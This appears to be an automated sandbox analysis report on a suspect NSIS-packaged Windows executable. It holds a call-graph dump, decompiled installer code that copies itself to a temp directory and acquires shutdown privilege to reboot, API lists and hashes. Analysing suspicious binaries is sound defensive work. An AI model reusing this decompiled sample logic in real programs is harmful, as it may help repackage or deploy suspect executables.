4417->4415 4420 4023dc 4418->4420 4422 402da6 17 API calls 4418->4422 4419->4418 4421 402da6 17 API calls 4420->4421 4423 4023e5 WritePrivateProfileStringW 
4421->4423 4422->4420 4424 402434 4425 402467 4424->4425 4426 40243c 4424->4426 4428 402da6 17 API calls 4425->4428 4427 402de6 17 API calls 4426->4427 4429 402443 4427->4429 4430 40246e 4428->4430 4432 40247b 4429->4432 4433 402da6 17 API calls 4429->4433 4435 402e64 4430->4435 4434 402454 RegDeleteValueW RegCloseKey 4433->4434 4434->4432 4436 402e78 4435->4436 4438 402e71 4435->4438 4436->4438 4439 402ea9 4436->4439 4438->4432 4440 4064db RegOpenKeyExW 4439->4440 4441 402ed7 4440->4441 4442 402f81 4441->4442 4443 402ee7 RegEnumValueW 4441->4443 4447 402f0a 4441->4447 4442->4438 4444 402f71 RegCloseKey 4443->4444 4443->4447 4444->4442 4445 402f46 RegEnumKeyW 4446 402f4f RegCloseKey 4445->4446 4445->4447 4448 406a3b 5 API calls 4446->4448 4447->4444 4447->4445 4447->4446 4449 402ea9 6 API calls 4447->4449 4450 402f5f 4448->4450 4449->4447 4450->4442 4451 402f63 RegDeleteKeyW 4450->4451 4451->4442 4452 401735 4453 402da6 17 API calls 4452->4453 4454 40173c SearchPathW 4453->4454 4455 401757 4454->4455 4456 405037 GetDlgItem GetDlgItem 4457 405089 7 API calls 4456->4457 4468 4052ae 4456->4468 4458 405130 DeleteObject 4457->4458 4459 405123 SendMessageW 4457->4459 4460 405139 4458->4460 4459->4458 4462 405170 4460->4462 4463 4066ab 17 API calls 4460->4463 4461 405390 4465 40543c 4461->4465 4475 4053e9 SendMessageW 4461->4475 4499 4052a1 4461->4499 4464 4045ca 18 API calls 4462->4464 4469 405152 SendMessageW SendMessageW 4463->4469 4470 405184 4464->4470 4466 405446 SendMessageW 4465->4466 4467 40544e 4465->4467 4466->4467 4477 405460 ImageList_Destroy 4467->4477 4478 405467 4467->4478 4489 405477 4467->4489 4468->4461 4473 404f85 5 API calls 4468->4473 4495 40531d 4468->4495 4469->4460 4474 4045ca 18 API calls 4470->4474 4471 405382 SendMessageW 4471->4461 4472 404631 8 API calls 4476 40563d 4472->4476 4473->4495 4486 405195 4474->4486 4480 4053fe SendMessageW 4475->4480 4475->4499 4477->4478 4481 405470 GlobalFree 4478->4481 4478->4489 4479 4055f1 4484 405603 
ShowWindow GetDlgItem ShowWindow 4479->4484 4479->4499 4483 405411 4480->4483 4481->4489 4482 405270 GetWindowLongW SetWindowLongW 4485 405289 4482->4485 4490 405422 SendMessageW 4483->4490 4484->4499 4487 4052a6 4485->4487 4488 40528e ShowWindow 4485->4488 4486->4482 4491 40526b 4486->4491 4494 4051e8 SendMessageW 4486->4494 4496 405226 SendMessageW 4486->4496 4497 40523a SendMessageW 4486->4497 4509 4045ff SendMessageW 4487->4509 4508 4045ff SendMessageW 4488->4508 4489->4479 4498 405005 4 API calls 4489->4498 4503 4054b2 4489->4503 4490->4465 4491->4482 4491->4485 4494->4486 4495->4461 4495->4471 4496->4486 4497->4486 4498->4503 4499->4472 4500 4055bc 4501 4055c7 InvalidateRect 4500->4501 4504 4055d3 4500->4504 4501->4504 4502 4054e0 SendMessageW 4507 4054f6 4502->4507 4503->4502 4503->4507 4504->4479 4510 404f40 4504->4510 4506 40556a SendMessageW SendMessageW 4506->4507 4507->4500 4507->4506 4508->4499 4509->4468 4513 404e77 4510->4513 4512 404f55 4512->4479 4514 404e90 4513->4514 4515 4066ab 17 API calls 4514->4515 4516 404ef4 4515->4516 4517 4066ab 17 API calls 4516->4517 4518 404eff 4517->4518 4519 4066ab 17 API calls 4518->4519 4520 404f15 lstrlenW wsprintfW SetDlgItemTextW 4519->4520 4520->4512 4521 401d38 4522 402d84 17 API calls 4521->4522 4523 401d3f 4522->4523 4524 402d84 17 API calls 4523->4524 4525 401d4b GetDlgItem 4524->4525 4526 402638 4525->4526 4527 4014b8 4528 4014be 4527->4528 4529 401389 2 API calls 4528->4529 4530 4014c6 4529->4530 4531 40473a lstrlenW 4532 404759 4531->4532 4533 40475b WideCharToMultiByte 4531->4533 4532->4533 4534 404abb 4535 404ae7 4534->4535 4536 404af8 4534->4536 4595 405cb2 GetDlgItemTextW 4535->4595 4538 404b04 GetDlgItem 4536->4538 4543 404b63 4536->4543 4541 404b18 4538->4541 4539 404c47 4544 404df6 4539->4544 4597 405cb2 GetDlgItemTextW 4539->4597 4540 404af2 4542 4068f5 5 API calls 4540->4542 4546 404b2c SetWindowTextW 4541->4546 4547 405fe8 4 API calls 4541->4547 4542->4536 4543->4539 4543->4544 4548 4066ab 17 
API calls 4543->4548 4551 404631 8 API calls 4544->4551 4550 4045ca 18 API calls 4546->4550 4552 404b22 4547->4552 4553 404bd7 SHBrowseForFolderW 4548->4553 4549 404c77 4554 406045 18 API calls 4549->4554 4555 404b48 4550->4555 4556 404e0a 4551->4556 4552->4546 4560 405f3d 3 API calls 4552->4560 4553->4539 4557 404bef CoTaskMemFree 4553->4557 4558 404c7d 4554->4558 4559 4045ca 18 API calls 4555->4559 4561 405f3d 3 API calls 4557->4561 4598 40666e lstrcpynW 4558->4598 4562 404b56 4559->4562 4560->4546 4563 404bfc 4561->4563 4596 4045ff SendMessageW 4562->4596 4566 404c33 SetDlgItemTextW 4563->4566 4571 4066ab 17 API calls 4563->4571 4566->4539 4567 404b5c 4569 406a3b 5 API calls 4567->4569 4568 404c94 4570 406a3b 5 API calls 4568->4570 4569->4543 4577 404c9b 4570->4577 4572 404c1b lstrcmpiW 4571->4572 4572->4566 4575 404c2c lstrcatW 4572->4575 4573 404cdc 4599 40666e lstrcpynW 4573->4599 4575->4566 4576 404ce3 4578 405fe8 4 API calls 4576->4578 4577->4573 4581 405f89 2 API calls 4577->4581 4583 404d34 4577->4583 4579 404ce9 GetDiskFreeSpaceW 4578->4579 4582 404d0d MulDiv 4579->4582 4579->4583 4581->4577 4582->4583 4584 404da5 4583->4584 4586 404f40 20 API calls 4583->4586 4585 404dc8 4584->4585 4587 40140b 2 API calls 4584->4587 4600 4045ec EnableWindow 4585->4600 4588 404d92 4586->4588 4587->4585 4590 404da7 SetDlgItemTextW 4588->4590 4591 404d97 4588->4591 4590->4584 4593 404e77 20 API calls 4591->4593 4592 404de4 4592->4544 4594 404a14 SendMessageW 4592->4594 4593->4584 4594->4544 4595->4540 4596->4567 4597->4549 4598->4568 4599->4576 4600->4592 4601 40263e 4602 402652 4601->4602 4603 40266d 4601->4603 4604 402d84 17 API calls 4602->4604 4605 402672 4603->4605 4606 40269d 4603->4606 4613 402659 4604->4613 4607 402da6 17 API calls 4605->4607 4608 402da6 17 API calls 4606->4608 4609 402679 4607->4609 4610 4026a4 lstrlenW 4608->4610 4618 406690 WideCharToMultiByte 4609->4618 4610->4613 4612 40268d lstrlenA 4612->4613 4614 4026e7 4613->4614 4616 40623f 5 API calls 
4613->4616 4617 4026d1 4613->4617 4615 406210 WriteFile 4615->4614 4616->4617 4617->4614 4617->4615 4618->4612

                    Control-flow Graph (function at 403646; legend: Executed / Not Executed)
                    C-Code - Quality: 78%
                    			_entry_() {
                    				WCHAR* _v8;
                    				signed int _v12;
                    				void* _v16;
                    				signed int _v20;
                    				int _v24;
                    				int _v28;
                    				struct _TOKEN_PRIVILEGES _v40;
                    				signed char _v42;
                    				int _v44;
                    				signed int _v48;
                    				intOrPtr _v278;
                    				signed short _v310;
                    				struct _OSVERSIONINFOW _v324;
                    				struct _SHFILEINFOW _v1016;
                    				intOrPtr* _t88;
                    				WCHAR* _t92;
                    				char* _t94;
                    				void _t97;
                    				void* _t116;
                    				WCHAR* _t118;
                    				signed int _t119;
                    				intOrPtr* _t123;
                    				void* _t137;
                    				void* _t143;
                    				void* _t148;
                    				void* _t152;
                    				void* _t157;
                    				signed int _t167;
                    				void* _t170;
                    				void* _t175;
                    				intOrPtr _t177;
                    				intOrPtr _t178;
                    				intOrPtr* _t179;
                    				int _t188;
                    				void* _t189;
                    				void* _t198;
                    				signed int _t204;
                    				signed int _t209;
                    				signed int _t214;
                    				signed int _t216;
                    				int* _t218;
                    				signed int _t226;
                    				signed int _t229;
                    				CHAR* _t231;
                    				char* _t232;
                    				signed int _t233;
                    				WCHAR* _t234;
                    				void* _t250;
                    
                    				_t216 = 0x20;
                    				_t188 = 0;
                    				_v24 = 0;
                    				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                    				_v20 = 0;
                    				SetErrorMode(0x8001); // executed
                    				_v324.szCSDVersion = 0;
                    				_v48 = 0;
                    				_v44 = 0;
                    				_v324.dwOSVersionInfoSize = 0x11c;
                    				if(GetVersionExW( &_v324) == 0) {
                    					_v324.dwOSVersionInfoSize = 0x114;
                    					GetVersionExW( &_v324);
                    					asm("sbb eax, eax");
                    					_v42 = 4;
                    					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                    				}
                    				if(_v324.dwMajorVersion < 0xa) {
                    					_v310 = _v310 & 0x00000000;
                    				}
                    				 *0x7a8b58 = _v324.dwBuildNumber;
                    				 *0x7a8b5c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                    				if( *0x7a8b5e != 0x600) {
                    					_t179 = E00406A3B(_t188);
                    					if(_t179 != _t188) {
                    						 *_t179(0xc00);
                    					}
                    				}
                    				_t231 = "UXTHEME";
                    				do {
                    					E004069CB(_t231); // executed
                    					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                    				} while ( *_t231 != 0);
                    				E00406A3B(0xb);
                    				 *0x7a8aa4 = E00406A3B(9);
                    				_t88 = E00406A3B(7);
                    				if(_t88 != _t188) {
                    					_t88 =  *_t88(0x1e);
                    					if(_t88 != 0) {
                    						 *0x7a8b5c =  *0x7a8b5c | 0x00000080;
                    					}
                    				}
                    				__imp__#17();
                    				__imp__OleInitialize(_t188); // executed
                    				 *0x7a8b60 = _t88;
                    				SHGetFileInfoW(0x79ff48, _t188,  &_v1016, 0x2b4, _t188); // executed
                    				E0040666E(0x7a7aa0, L"NSIS Error");
                    				_t92 = GetCommandLineW();
                    				_t232 = L"\"C:\\Users\\hardz\\Desktop\\inlaww321345.exe\" ";
                    				E0040666E(_t232, _t92);
                    				_t94 = _t232;
                    				_t233 = 0x22;
                    				 *0x7a8aa0 = 0x400000;
                    				_t250 = L"\"C:\\Users\\hardz\\Desktop\\inlaww321345.exe\" " - _t233; // 0x22
                    				if(_t250 == 0) {
                    					_t216 = _t233;
                    					_t94 =  &M007B3002;
                    				}
                    				_t198 = CharNextW(E00405F6A(_t94, _t216));
                    				_v16 = _t198;
                    				while(1) {
                    					_t97 =  *_t198;
                    					_t251 = _t97 - _t188;
                    					if(_t97 == _t188) {
                    						break;
                    					}
                    					_t209 = 0x20;
                    					__eflags = _t97 - _t209;
                    					if(_t97 != _t209) {
                    						L17:
                    						__eflags =  *_t198 - _t233;
                    						_v12 = _t209;
                    						if( *_t198 == _t233) {
                    							_v12 = _t233;
                    							_t198 = _t198 + 2;
                    							__eflags = _t198;
                    						}
                    						__eflags =  *_t198 - 0x2f;
                    						if( *_t198 != 0x2f) {
                    							L32:
                    							_t198 = E00405F6A(_t198, _v12);
                    							__eflags =  *_t198 - _t233;
                    							if(__eflags == 0) {
                    								_t198 = _t198 + 2;
                    								__eflags = _t198;
                    							}
                    							continue;
                    						} else {
                    							_t198 = _t198 + 2;
                    							__eflags =  *_t198 - 0x53;
                    							if( *_t198 != 0x53) {
                    								L24:
                    								asm("cdq");
                    								asm("cdq");
                    								_t214 = L"NCRC" & 0x0000ffff;
                    								asm("cdq");
                    								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
                    								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
                    								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
                    									L29:
                    									asm("cdq");
                    									asm("cdq");
                    									_t209 = L" /D=" & 0x0000ffff;
                    									asm("cdq");
                    									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
                    									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
                    									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
                    										L31:
                    										_t233 = 0x22;
                    										goto L32;
                    									}
                    									__eflags =  *_t198 - _t229;
                    									if( *_t198 == _t229) {
                    										 *(_t198 - 4) = _t188;
                    										__eflags = _t198;
                    										E0040666E(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t198);
                    										L37:
                    										_t234 = L"C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                    										GetTempPathW(0x400, _t234);
                    										_t116 = E00403615(_t198, _t251);
                    										_t252 = _t116;
                    										if(_t116 != 0) {
                    											L40:
                    											DeleteFileW(L"1033"); // executed
                    											_t118 = E004030D0(_t254, _v20); // executed
                    											_v8 = _t118;
                    											if(_t118 != _t188) {
                    												L68:
                    												ExitProcess(); // executed
                    												__imp__OleUninitialize(); // executed
                    												if(_v8 == _t188) {
                    													if( *0x7a8b34 == _t188) {
                    														L77:
                    														_t119 =  *0x7a8b4c;
                    														if(_t119 != 0xffffffff) {
                    															_v24 = _t119;
                    														}
                    														ExitProcess(_v24);
                    													}
                    													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                    														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                    														_v40.PrivilegeCount = 1;
                    														_v28 = 2;
                    														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                    													}
                    													_t123 = E00406A3B(4);
                    													if(_t123 == _t188) {
                    														L75:
                    														if(ExitWindowsEx(2, 0x80040002) != 0) {
                    															goto L77;
                    														}
                    														goto L76;
                    													} else {
                    														_push(0x80040002);
                    														_push(0x25);
                    														_push(_t188);
                    														_push(_t188);
                    														_push(_t188);
                    														if( *_t123() == 0) {
                    															L76:
                    															E0040140B(9);
                    															goto L77;
                    														}
                    														goto L75;
                    													}
                    												}
                    												E00405CCE(_v8, 0x200010);
                    												ExitProcess(2);
                    											}
                    											if( *0x7a8abc == _t188) {
                    												L51:
                    												 *0x7a8b4c =  *0x7a8b4c | 0xffffffff;
                    												_v24 = E00403D1D(_t264);
                    												goto L68;
                    											}
                    											_t218 = E00405F6A(L"\"C:\\Users\\hardz\\Desktop\\inlaww321345.exe\" ", _t188);
                    											if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\inlaww321345.exe\" ") {
                    												L48:
                    												_t263 = _t218 - L"\"C:\\Users\\hardz\\Desktop\\inlaww321345.exe\" ";
                    												_v8 = L"Error launching installer";
                    												if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\inlaww321345.exe\" ") {
                    													_t189 = E00405C39(__eflags);
                    													lstrcatW(_t234, L"~nsu");
                    													__eflags = _t189;
                    													if(_t189 != 0) {
                    														lstrcatW(_t234, "A");
                    													}
                    													lstrcatW(_t234, L".tmp");
                    													_t137 = lstrcmpiW(_t234, 0x7b4800);
                    													__eflags = _t137;
                    													if(_t137 == 0) {
                    														L67:
                    														_t188 = 0;
                    														__eflags = 0;
                    														goto L68;
                    													} else {
                    														__eflags = _t189;
                    														_push(_t234);
                    														if(_t189 == 0) {
                    															E00405C1C();
                    														} else {
                    															E00405B9F();
                    														}
                    														SetCurrentDirectoryW(_t234);
                    														__eflags = L"C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
                    														if(__eflags == 0) {
                    															E0040666E(L"C:\\Users\\hardz\\AppData\\Local\\Temp", 0x7b4800);
                    														}
                    														E0040666E(0x7a9000, _v16);
                    														_t201 = "A" & 0x0000ffff;
                    														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                    														__eflags = _t143;
                    														_v12 = 0x1a;
                    														 *0x7a9800 = _t143;
                    														do {
                    															E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x120)));
                    															DeleteFileW(0x79f748);
                    															__eflags = _v8;
                    															if(_v8 != 0) {
                    																_t148 = CopyFileW(L"C:\\Users\\hardz\\Desktop\\inlaww321345.exe", 0x79f748, 1);
                    																__eflags = _t148;
                    																if(_t148 != 0) {
                    																	E0040642E(_t201, 0x79f748, 0);
                    																	E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x124)));
                    																	_t152 = E00405C51(0x79f748);
                    																	__eflags = _t152;
                    																	if(_t152 != 0) {
                    																		CloseHandle(_t152);
                    																		_v8 = 0;
                    																	}
                    																}
                    															}
                    															 *0x7a9800 =  *0x7a9800 + 1;
                    															_t61 =  &_v12;
                    															 *_t61 = _v12 - 1;
                    															__eflags =  *_t61;
                    														} while ( *_t61 != 0);
                    														E0040642E(_t201, _t234, 0);
                    														goto L67;
                    													}
                    												}
                    												 *_t218 = _t188;
                    												_t221 =  &(_t218[2]);
                    												_t157 = E00406045(_t263,  &(_t218[2]));
                    												_t264 = _t157;
                    												if(_t157 == 0) {
                    													goto L68;
                    												}
                    												E0040666E(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t221);
                    												E0040666E(0x7b4000, _t221);
                    												_v8 = _t188;
                    												goto L51;
                    											}
                    											asm("cdq");
                    											asm("cdq");
                    											asm("cdq");
                    											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                    											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                    											while( *_t218 != _t204 || _t218[1] != _t167) {
                    												_t218 = _t218;
                    												if(_t218 >= L"\"C:\\Users\\hardz\\Desktop\\inlaww321345.exe\" ") {
                    													continue;
                    												}
                    												break;
                    											}
                    											_t188 = 0;
                    											goto L48;
                    										}
                    										GetWindowsDirectoryW(_t234, 0x3fb);
                    										lstrcatW(_t234, L"\\Temp");
                    										_t170 = E00403615(_t198, _t252);
                    										_t253 = _t170;
                    										if(_t170 != 0) {
                    											goto L40;
                    										}
                    										GetTempPathW(0x3fc, _t234);
                    										lstrcatW(_t234, L"Low");
                    										SetEnvironmentVariableW(L"TEMP", _t234);
                    										SetEnvironmentVariableW(L"TMP", _t234);
                    										_t175 = E00403615(_t198, _t253);
                    										_t254 = _t175;
                    										if(_t175 == 0) {
                    											goto L68;
                    										}
                    										goto L40;
                    									}
                    									goto L31;
                    								}
                    								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                    								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                    									goto L29;
                    								}
                    								_t177 =  *((intOrPtr*)(_t198 + 8));
                    								__eflags = _t177 - 0x20;
                    								if(_t177 == 0x20) {
                    									L28:
                    									_t36 =  &_v20;
                    									 *_t36 = _v20 | 0x00000004;
                    									__eflags =  *_t36;
                    									goto L29;
                    								}
                    								__eflags = _t177 - _t188;
                    								if(_t177 != _t188) {
                    									goto L29;
                    								}
                    								goto L28;
                    							}
                    							_t178 =  *((intOrPtr*)(_t198 + 2));
                    							__eflags = _t178 - _t209;
                    							if(_t178 == _t209) {
                    								L23:
                    								 *0x7a8b40 = 1;
                    								goto L24;
                    							}
                    							__eflags = _t178 - _t188;
                    							if(_t178 != _t188) {
                    								goto L24;
                    							}
                    							goto L23;
                    						}
                    					} else {
                    						goto L16;
                    					}
                    					do {
                    						L16:
                    						_t198 = _t198 + 2;
                    						__eflags =  *_t198 - _t209;
                    					} while ( *_t198 == _t209);
                    					goto L17;
                    				}
                    				goto L37;
                    			}




















































                    APIs
                    • SetErrorMode.KERNELBASE(00008001), ref: 00403669
                    • GetVersionExW.KERNEL32(?), ref: 00403692
                    • GetVersionExW.KERNEL32(0000011C), ref: 004036A9
                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403740
                    • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040377C
                    • OleInitialize.OLE32(00000000), ref: 00403783
                    • SHGetFileInfoW.SHELL32(0079FF48,00000000,?,000002B4,00000000), ref: 004037A1
                    • GetCommandLineW.KERNEL32(007A7AA0,NSIS Error), ref: 004037B6
                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\inlaww321345.exe" ,00000020,"C:\Users\user\Desktop\inlaww321345.exe" ,00000000), ref: 004037EF
                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403922
                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403933
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040393F
                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403953
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040395B
                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040396C
                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403974
                    • DeleteFileW.KERNELBASE(1033), ref: 00403988
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A6F
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A7E
                      • Part of subcall function 00405C1C: CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A89
                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B4800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\inlaww321345.exe" ,00000000,?), ref: 00403A95
                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AB5
                    • DeleteFileW.KERNEL32(0079F748,0079F748,?,007A9000,?), ref: 00403B14
                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\inlaww321345.exe,0079F748,00000001), ref: 00403B27
                    • CloseHandle.KERNEL32(00000000,0079F748,0079F748,?,0079F748,00000000), ref: 00403B54
                    • ExitProcess.KERNEL32(?), ref: 00403B72
                    • OleUninitialize.OLE32(?), ref: 00403B77
                    • ExitProcess.KERNEL32 ref: 00403B91
                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BA5
                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403BAC
                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BC0
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BDF
                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C04
                    • ExitProcess.KERNEL32 ref: 00403C25
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                    • String ID: "C:\Users\user\Desktop\inlaww321345.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\inlaww321345.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                    • API String ID: 2292928366-928328702
                    • Opcode ID: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
                    • Instruction ID: 9002a92140da6a8b371a97510ecbbb4cdf1836846ed801e4a5207059f252ac0c
                    • Opcode Fuzzy Hash: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
                    • Instruction Fuzzy Hash: EAE13571A00214AAD720AFB58D45BAF7EB9EB45709F10843EF541B62D1DB7C8E41CB2D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 390 405d7a-405da0 call 406045 393 405da2-405db4 DeleteFileW 390->393 394 405db9-405dc0 390->394 395 405f36-405f3a 393->395 396 405dc2-405dc4 394->396 397 405dd3-405de3 call 40666e 394->397 399 405ee4-405ee9 396->399 400 405dca-405dcd 396->400 403 405df2-405df3 call 405f89 397->403 404 405de5-405df0 lstrcatW 397->404 399->395 402 405eeb-405eee 399->402 400->397 400->399 405 405ef0-405ef6 402->405 406 405ef8-405f00 call 4069a4 402->406 407 405df8-405dfc 403->407 404->407 405->395 406->395 414 405f02-405f16 call 405f3d call 405d32 406->414 410 405e08-405e0e lstrcatW 407->410 411 405dfe-405e06 407->411 413 405e13-405e2f lstrlenW FindFirstFileW 410->413 411->410 411->413 415 405e35-405e3d 413->415 416 405ed9-405edd 413->416 432 405f18-405f1b 414->432 433 405f2e-405f31 call 4056d0 414->433 419 405e5d-405e71 call 40666e 415->419 420 405e3f-405e47 415->420 416->399 418 405edf 416->418 418->399 430 405e73-405e7b 419->430 431 405e88-405e93 call 405d32 419->431 422 405e49-405e51 420->422 423 405ebc-405ecc FindNextFileW 420->423 422->419 427 405e53-405e5b 422->427 423->415 426 405ed2-405ed3 FindClose 423->426 426->416 427->419 427->423 430->423 435 405e7d-405e86 call 405d7a 430->435 443 405eb4-405eb7 call 4056d0 431->443 444 405e95-405e98 431->444 432->405 434 405f1d-405f2c call 4056d0 call 40642e 432->434 433->395 434->395 435->423 443->423 446 405e9a-405eaa call 4056d0 call 40642e 444->446 447 405eac-405eb2 444->447 446->423 447->423
                    C-Code - Quality: 98%
                    			E00405D7A(void* __eflags, signed int _a4, signed int _a8) {
                    				signed int _v8;
                    				signed int _v12;
                    				short _v556;
                    				short _v558;
                    				struct _WIN32_FIND_DATAW _v604;
                    				signed int _t38;
                    				signed int _t52;
                    				signed int _t55;
                    				signed int _t62;
                    				void* _t64;
                    				signed char _t65;
                    				WCHAR* _t66;
                    				void* _t67;
                    				WCHAR* _t68;
                    				void* _t70;
                    
                    				_t65 = _a8;
                    				_t68 = _a4;
                    				_v8 = _t65 & 0x00000004;
                    				_t38 = E00406045(__eflags, _t68);
                    				_v12 = _t38;
                    				if((_t65 & 0x00000008) != 0) {
                    					_t62 = DeleteFileW(_t68); // executed
                    					asm("sbb eax, eax");
                    					_t64 =  ~_t62 + 1;
                    					 *0x7a8b28 =  *0x7a8b28 + _t64;
                    					return _t64;
                    				}
                    				_a4 = _t65;
                    				_t8 =  &_a4;
                    				 *_t8 = _a4 & 0x00000001;
                    				__eflags =  *_t8;
                    				if( *_t8 == 0) {
                    					L5:
                    					E0040666E(0x7a3f90, _t68);
                    					__eflags = _a4;
                    					if(_a4 == 0) {
                    						E00405F89(_t68);
                    					} else {
                    						lstrcatW(0x7a3f90, L"\\*.*");
                    					}
                    					__eflags =  *_t68;
                    					if( *_t68 != 0) {
                    						L10:
                    						lstrcatW(_t68, 0x40a014);
                    						L11:
                    						_t66 =  &(_t68[lstrlenW(_t68)]);
                    						_t38 = FindFirstFileW(0x7a3f90,  &_v604); // executed
                    						_t70 = _t38;
                    						__eflags = _t70 - 0xffffffff;
                    						if(_t70 == 0xffffffff) {
                    							L26:
                    							__eflags = _a4;
                    							if(_a4 != 0) {
                    								_t30 = _t66 - 2;
                    								 *_t30 =  *(_t66 - 2) & 0x00000000;
                    								__eflags =  *_t30;
                    							}
                    							goto L28;
                    						} else {
                    							goto L12;
                    						}
                    						do {
                    							L12:
                    							__eflags = _v604.cFileName - 0x2e;
                    							if(_v604.cFileName != 0x2e) {
                    								L16:
                    								E0040666E(_t66,  &(_v604.cFileName));
